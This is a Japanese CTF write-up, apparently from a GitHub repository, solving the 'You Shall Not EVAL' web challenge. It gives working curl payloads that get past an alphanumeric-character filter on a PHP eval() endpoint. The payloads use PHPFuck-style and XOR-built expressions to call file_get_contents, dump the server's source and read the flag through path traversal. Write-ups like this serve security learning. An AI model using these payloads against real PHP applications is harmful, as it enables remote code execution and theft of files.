Name	Name	Last commit message	Last commit date
parent directory ..
README.md	README.md

You Shall Not EVAL:Web:782pts

You must defeat and pass through many enemies to get to it, and even then, what you desire could only be called upon with great hardship
Click here

Solution

アクセスしても以下のメッセージが表示されるだけであった。

$ curl https://ch7.sbug.se/
No 'command' param received.

指示されたパラメータを含めるが怒られる。

$ curl https://ch7.sbug.se/?command=whoami
Are you trying to inject malicious code?!
$ curl https://ch7.sbug.se/?command=a
Are you trying to inject malicious code?!

文字が何も与えられないわけもないので、試していると以下のように記号は通るようだった。

$ curl "https://ch7.sbug.se/?command=@" --head
HTTP/2 500
~~~
$ curl "https://ch7.sbug.se/?command='" --head
HTTP/2 500
~~~

500なので困っていると;で200が返ってきた。

$ curl 'https://ch7.sbug.se/?command=;' --head
HTTP/2 200
~~~

コードが実行できそうなので、配列などを試す。

$ curl 'https://ch7.sbug.se/?command=[]^[];' --head
HTTP/2 200
~~~

実行できている。
ここでPHPFuckを思い出す。

//printf
(([]^[[]]).[][[]]^([].[])[([]^[])]).(([].[])[([]^[[]])]).(([]^[]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[]).[][[]]^([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])])
//Satoki
(([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])])
//printf(Satoki)
((([]^[[]]).[][[]]^([].[])[([]^[])]).(([].[])[([]^[[]])]).(([]^[]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[]).[][[]]^([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]))((([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([].[])[([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]).(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[[]])+([]^[[]]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]).(([]^[]).[][[]]^([].[])[([]^[])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])]^([].[])[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]))

エンコードして実行する。

$ curl 'https://ch7.sbug.se/?command=%28%28%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%29%2E%28%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%29%28%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%2E%28%28%5B%5D%5E%5B%5D%29%2E%5B%5D%5B%5B%5D%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%5E%28%5B%5D%2E%5B%5D%29%5B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%2B%28%5B%5D%5E%5B%5B%5D%5D%29%5D%29%29;'
Satoki

任意のコードを実行すればよいが、長すぎるので英文字を使えるようにする。
$_ = "_GET"が$_="`{{{"^"?<>/";で表せると知られている。
$_GET[_]($_GET[__]($_GET[___]))とし、printf(file_get_contents(index.php))を行う。
GETを消去すると、$_="`{{{"^"?<>/";${$_}[_](${$_}[__](${$_}[___]));となるのでアクセスし、ファイルを取得する。

#https://ch7.sbug.se/?command=$_="`{{{"^"?<>/";${$_}[_](${$_}[__](${$_}[___]));&_=printf&__=file_get_contents&___=index.php
$ curl 'https://ch7.sbug.se/?command=$_=%22%60%7B%7B%7B%22%5E%22%3F%3C%3E%2F%22%3B%24%7B%24_%7D%5B_%5D(%24%7B%24_%7D%5B__%5D(%24%7B%24_%7D%5B___%5D));&_=printf&__=file_get_contents&___=index.php'
<?php
        $EOL_W = "\r\n"; // Windows CR+LF
        $EOL_L = "\n";   // Linux LF
        if(isset($_GET["command"])){
                $_GET["command"] = str_replace($EOL_W, "", $_GET["command"]);
                $_GET["command"] = str_replace($EOL_L, "", $_GET["command"]);
                if(!preg_match("/[A-Za-z0-9]/is", $_GET["command"])){
                        eval($_GET["command"]);
                }else{
                        die("Are you trying to inject malicious code?!");
                }
        }else{
                die("No 'command' param received.");
        }
?>
$ curl 'https://ch7.sbug.se/?command=$_=%22%60%7B%7B%7B%22%5E%22%3F%3C%3E%2F%22%3B%24%7B%24_%7D%5B_%5D(%24%7B%24_%7D%5B__%5D(%24%7B%24_%7D%5B___%5D));&_=printf&__=file_get_contents&___=flag'
$ curl 'https://ch7.sbug.se/?command=$_=%22%60%7B%7B%7B%22%5E%22%3F%3C%3E%2F%22%3B%24%7B%24_%7D%5B_%5D(%24%7B%24_%7D%5B__%5D(%24%7B%24_%7D%5B___%5D));&_=printf&__=file_get_contents&___=../flag'
$ curl 'https://ch7.sbug.se/?command=$_=%22%60%7B%7B%7B%22%5E%22%3F%3C%3E%2F%22%3B%24%7B%24_%7D%5B_%5D(%24%7B%24_%7D%5B__%5D(%24%7B%24_%7D%5B___%5D));&_=printf&__=file_get_contents&___=../../flag'
SBCTF{7h3r3_4nd_B4ck_4g41n}

たどっていくとflagが運良く手に入った。
場所がわからない場合はコマンド実行すればよい。

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

You_Shall_Not_EVAL

You_Shall_Not_EVAL

README.md

README.md

README.md

You Shall Not EVAL:Web:782pts

Solution

SBCTF{7h3r3_4nd_B4ck_4g41n}

Files

You_Shall_Not_EVAL

Directory actions

More options

Directory actions

More options

Latest commit

History

You_Shall_Not_EVAL

Folders and files

parent directory

README.md

README.md

README.md

You Shall Not EVAL:Web:782pts

Solution

SBCTF{7h3r3_4nd_B4ck_4g41n}